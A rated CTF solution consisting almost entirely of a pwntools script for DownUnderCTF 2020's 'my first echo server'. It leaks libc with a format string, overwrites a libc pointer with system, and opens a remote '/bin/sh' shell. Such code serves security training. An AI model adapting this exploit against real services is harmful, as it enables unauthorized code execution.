Rating: 5.0
[https://github.com/vakzz/ctfs/blob/master/DownUnder2020/my%20first%20echo%20server/solv.py](https://github.com/vakzz/ctfs/blob/master/DownUnder2020/my%20first%20echo%20server/solv.py)
```python
#!/usr/bin/env python3
# pylint: disable=unused-wildcard-import
import sys
import os
from pwn import *
def exec_fmt(payload):
p.sendline(payload)
return p.recvline()
def exploit():
p.sendline("%3$p")
read17 = int(p.recvline(), 16)
log.info("read: 0x{:x}".format(read17 - 17))
libc.address = read17 - libc.symbols['read'] - 17
log.info("libc.address: 0x{:x}".format(libc.address))
payload = fmtstr_payload(8, {
libc.address+0x3eb048-4: (libc.symbols["system"] & 0xffffffff) << 32
}, numbwritten=0, write_size='short')
print(len(payload))
p.sendline(payload)
p.sendline("/bin/sh;")
p.interactive()
if __name__ == "__main__":
context.terminal = ["tmux", "sp", "-h"]
context.arch = "amd64"
name = "./echos"
if len(sys.argv) > 1:
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6", checksec=False)
binary = ELF(name, checksec=False)
p = remote("chal.duc.tf", 30001)
else:
binary = ELF(name, checksec=False)
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6", checksec=False)
p = process(name, env={})
gdb.attach(p, gdbscript="""
""")
exploit()
```